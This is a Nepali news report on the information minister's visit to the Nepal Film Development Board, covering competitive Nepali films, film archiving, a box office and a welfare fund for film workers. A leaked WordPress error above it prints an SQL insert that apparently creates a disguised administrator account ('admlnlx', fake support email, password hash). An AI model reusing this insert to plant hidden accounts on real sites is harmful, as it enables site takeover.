WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJhiuiRlrQsKZloxh3XjK0dHPhh8o8/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-10 11:43:07', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २७–
सूचना तथा सञ्चारमन्त्री सुरेन्द्रकुमार कार्कीले विदेशी चललिचत्रसँग प्रतिस्पर्धा गर्न सक्ने खालका नेपाली चलचित्र निर्माण गर्नेतर्फ ध्यान केन्द्रित गर्नुपर्ने बताउनुभएको छ ।
नेपाल चलचित्र विकास बोर्डको आज निरीक्षणका क्रममा उहाँले नेपालको भौगोलिक स्थिति, रहनसहन, हावापानी र विविध भाषाशैलीका कारण यहाँ जुनसुकै चलचित्र पनि उत्कृष्ट बनाउन सकिने बताउनुभयो । पुराना चलचित्र सङ्ग्रह गर्नेतर्फ पनि विशेष ध्यान जानुपर्नेमा जोड दिँदै मन्त्री कार्कीले ‘बक्स अफिस’ निर्माणका लागि आवश्यक बजेट तर्जुमा भइसकेकाले यसतर्फ बोर्डको ध्यानाकर्षण गराउनुभयो ।
सो अवसरमा सञ्चार मन्त्रालयका सचिव दिनेशकुमार थपलियाले चलचित्र क्षेत्रमा लाग्नेहरुका लागि चलचित्रकर्मी वृत्तिकोष स्थापना गर्न जरुरी रहेको बताउँदै कोषमा रहेका रकमले वृद्धवृद्धा चलचित्रकर्मीका लागि मासिक रुपमा अनुदान दिने व्यवस्था गर्न सकिने बताउनुभयो । उहाँले ज्येष्ठ कलाकारलाई अस्पताल, यातायात जस्ता सार्वजनिक संस्थामा सुविधा दिने गरी कोषको स्थापना हुनुपर्ने बताउनुभयो ।
विकास बोर्डका कार्यकारी अध्यक्ष राजकुमार राईले नेपाली चलचित्रको सङ्ग्रह र बक्स अफिस निर्माण छिट्टै थालिने प्रतिबद्धता व्यक्त गर्नुभयो । –रासस